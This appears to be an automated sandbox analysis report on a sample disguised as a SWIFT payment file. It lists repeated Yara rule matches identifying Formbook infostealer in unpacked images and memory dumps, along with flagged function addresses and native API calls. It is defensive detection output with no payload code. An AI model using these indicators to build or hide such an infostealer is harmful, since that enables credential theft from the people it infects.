Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: TT_SWIFT_Export Order_noref S10SMG00318021.exe
Uses 32bit PE files
Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.2.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 8.0.TT_SWIFT_Export Order_noref S10SMG00318021.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Detected potential crypto function
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_00FD8250 0_2_00FD8250
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_00FDD2F8 0_2_00FDD2F8
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_052A5AA0 0_2_052A5AA0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 0_2_052A5AB0 0_2_052A5AB0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C027 8_2_0041C027
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00401030 8_2_00401030
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C196 8_2_0041C196
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C9AB 8_2_0041C9AB
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041BB0C 8_2_0041BB0C
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041BC18 8_2_0041BC18
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00408C90 8_2_00408C90
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_0041C575 8_2_0041C575
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00402D88 8_2_00402D88
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00402D90 8_2_00402D90
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00402FB0 8_2_00402FB0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013C0D20 8_2_013C0D20
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01491D55 8_2_01491D55
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013E4120 8_2_013E4120
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013CF900 8_2_013CF900
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013DD5E0 8_2_013DD5E0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013D841F 8_2_013D841F
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_01481002 8_2_01481002
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013DB090 8_2_013DB090
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013FEBB0 8_2_013FEBB0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_013E6E30 8_2_013E6E30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03032B28 20_2_03032B28
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0302DBD2 20_2_0302DBD2
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_030203DA 20_2_030203DA
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0301FA2B 20_2_0301FA2B
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F9EBB0 20_2_02F9EBB0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_030322AE 20_2_030322AE
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F920A0 20_2_02F920A0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F7B090 20_2_02F7B090
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03021002 20_2_03021002
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0303E824 20_2_0303E824
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_030320A8 20_2_030320A8
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F84120 20_2_02F84120
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_030328EC 20_2_030328EC
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F6F900 20_2_02F6F900
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F86E30 20_2_02F86E30
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0303DFCE 20_2_0303DFCE
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03031FF1 20_2_03031FF1
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0302D616 20_2_0302D616
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03032EF7 20_2_03032EF7
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03032D07 20_2_03032D07
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_03031D55 20_2_03031D55
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_030325DD 20_2_030325DD
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F7841F 20_2_02F7841F
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F7D5E0 20_2_02F7D5E0
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_0302D466 20_2_0302D466
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F92581 20_2_02F92581
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_02F60D20 20_2_02F60D20
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CC027 20_2_006CC027
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CC9AB 20_2_006CC9AB
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CC196 20_2_006CC196
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CBB0C 20_2_006CBB0C
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006CBC18 20_2_006CBC18
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006B8C90 20_2_006B8C90
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006B2D88 20_2_006B2D88
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006B2D90 20_2_006B2D90
Source: C:\Windows\SysWOW64\help.exe Code function: 20_2_006B2FB0 20_2_006B2FB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: String function: 013CB150 appears 32 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 02F6B150 appears 45 times
Contains functionality to call native functions
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004185F0 NtCreateFile, 8_2_004185F0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004186A0 NtReadFile, 8_2_004186A0
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_00418720 NtClose, 8_2_00418720
Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe Code function: 8_2_004187D0 NtAllocateVirtualMemory, 8_2_004187D0
